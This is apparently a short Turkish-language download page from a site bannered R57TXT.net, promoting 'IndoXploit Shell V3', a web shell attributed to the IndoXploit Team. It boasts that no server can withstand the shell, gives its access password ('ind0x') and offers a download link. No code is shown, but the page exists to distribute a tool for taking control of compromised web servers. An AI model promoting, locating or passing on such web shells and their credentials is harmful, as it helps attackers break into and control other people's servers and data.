██████╗ ███████╗███████╗████████╗██╗ ██╗████████╗
██╔══██╗██╔════╝╚════██║╚══██╔══╝╚██╗██╔╝╚══██╔══╝
██████╔╝███████╗  ██╔╝  ██║  ╚███╔╝  ██║  
██╔══██╗╚════██║  ██╔╝  ██║  ██╔██╗  ██║  
██║ ██║███████║  ██║   ██║  ██╔╝ ██╗  ██║  
╚═╝ ╚═╝╚══════╝  ╚═╝   ╚═╝  ╚═╝ ╚═╝  ╚═╝ .net
                                                   

 

IndoXploit Shell V3

IndoXploit Team'ın özel olarak yazdığı bu shell 2018 yılı yani geçen 3 hafta önce çıktı bundan öncede v1 ve v2 sürümünü sunan grup açıklamalarında bu shell ile geçilmeyecek sunucu tanımadıklarını söylüyorlar Password / Şifre: ind0x

Download/İndir
IndoXploit Shell V3